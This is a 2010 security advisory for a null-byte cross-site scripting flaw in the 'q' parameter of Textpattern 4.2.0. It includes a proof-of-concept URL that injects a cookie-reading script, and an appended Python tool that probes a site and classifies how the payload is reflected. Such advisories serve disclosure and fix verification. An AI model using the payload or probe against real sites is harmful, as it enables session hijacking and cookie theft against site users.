Textpattern 4.2.0 Cross Site Scripting

2010-09-08T00:00:00
ID PACKETSTORM:93605
Type packetstorm
Reporter LiquidWorm
Modified 2010-09-08T00:00:00

Description

Textpattern 4.2.0 (txplib_db) Null Termination Cross-Site Scripting Vulnerability  
  
  
Vendor: Team Textpattern  
Product web page: http://www.textpattern.com  
Affected version: 4.2.0  
  
  
Summary: Textpattern is an open source content management system  
unlike any other; it allows you to easily create, edit and publish  
content and make it beautiful in a professional, standards-compliant  
manner.  
  
  
Desc: Textpattern CMS version 4.2.0 suffers from an XSS vulnerability.  
Input passed via the "q" parameter to the Textpattern (TXP) Tag Library  
(txplib_db.php) is not properly sanitised before being returned to  
the user; a leading null byte (%00) gets the payload past the filtering.  
This can be exploited to execute arbitrary HTML and script code in a  
user's browser session in the context of an affected site.  
  
  
Tested on: Microsoft Windows XP Professional SP3 (EN)  
PHP 5.3.0  
MySQL 5.1.36  
Apache 2.2.11 (Win32)  
  
  
Vendor status: [05.09.2010] Vulnerability discovered.  
[05.09.2010] Initial contact with the vendor.  
[07.09.2010] No reply from vendor.  
[08.09.2010] Public advisory released.  
  
  
Vulnerability discovered by: Gjoko 'LiquidWorm' Krstic  
Zero Science Lab - http://www.zeroscience.mk  
liquidworm gmail com  
  
  
Zero Science Lab Advisory ID: ZSL-2010-4963  
  
Advisory URL: http://www.zeroscience.mk/en/vulnerabilities/ZSL-2010-4963.php  
  
  
PoC:  
  
http://127.0.0.1/?q=%00<script>alert(document.cookie)</script>  
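To verify the PoC against a test installation, and to confirm a fix actually encodes the reflected search term rather than just hiding the alert, the following is an added example (not code from the advisory or from Textpattern). It builds the advisory's request with and without the leading NUL byte and classifies a response body as reflecting the payload raw, HTML-encoded, or not at all. The base URL and the two sample response bodies are constructed for the example.

```python
# Added example for the Textpattern 4.2.0 "q" XSS advisory (ZSL-2010-4963).
# Not code from the advisory or from Textpattern. The base URL and the
# sample response bodies below are constructed for illustration.
import html
import urllib.parse
import urllib.request

# Payload taken from the advisory's PoC.
MARKER = "<script>alert(document.cookie)</script>"


def build_urls(base, marker=MARKER):
    """Return the two probe URLs: bare payload and NUL-prefixed payload.

    The advisory's PoC leaves '<' and '>' unencoded in the URL; a client
    percent-encodes them on the wire, so that is done explicitly here.
    """
    encoded = urllib.parse.quote(marker, safe="")
    return {
        "plain": f"{base}/?q={encoded}",
        "nul_prefix": f"{base}/?q=%00{encoded}",
    }


def classify(body, marker=MARKER):
    """Report how a response body reflects the marker.

    'raw'     - tags came back intact, so the script would run
    'encoded' - what htmlspecialchars()/html.escape() output looks like
    'absent'  - the search term was not echoed at all
    """
    if marker in body:
        return "raw"
    if html.escape(marker, quote=True) in body:
        return "encoded"
    return "absent"


def probe(url, timeout=10):
    """Fetch a URL and classify its body (needs network access)."""
    with urllib.request.urlopen(url, timeout=timeout) as resp:
        body = resp.read().decode("utf-8", errors="replace")
    return classify(body)


# Constructed response bodies standing in for a vulnerable and a patched site.
# The vulnerable one echoes the NUL byte and the tags untouched.
VULNERABLE_BODY = (
    "<h3>Search results for "
    "\x00<script>alert(document.cookie)</script></h3>"
)
PATCHED_BODY = (
    "<h3>Search results for "
    "&lt;script&gt;alert(document.cookie)&lt;/script&gt;</h3>"
)

if __name__ == "__main__":
    for name, url in build_urls("http://127.0.0.1").items():
        print(name, url)
    print("vulnerable sample:", classify(VULNERABLE_BODY))
    print("patched sample:", classify(PATCHED_BODY))
```

A "raw" result still needs a look in a browser before calling it exploitable: the same bytes inside a `<title>` element or an HTML comment will not execute, while "encoded" is the only outcome that shows the sink is being escaped. Run both URLs; a site where the bare payload comes back "encoded" but the NUL-prefixed one comes back "raw" has exactly the filter-bypass the advisory describes.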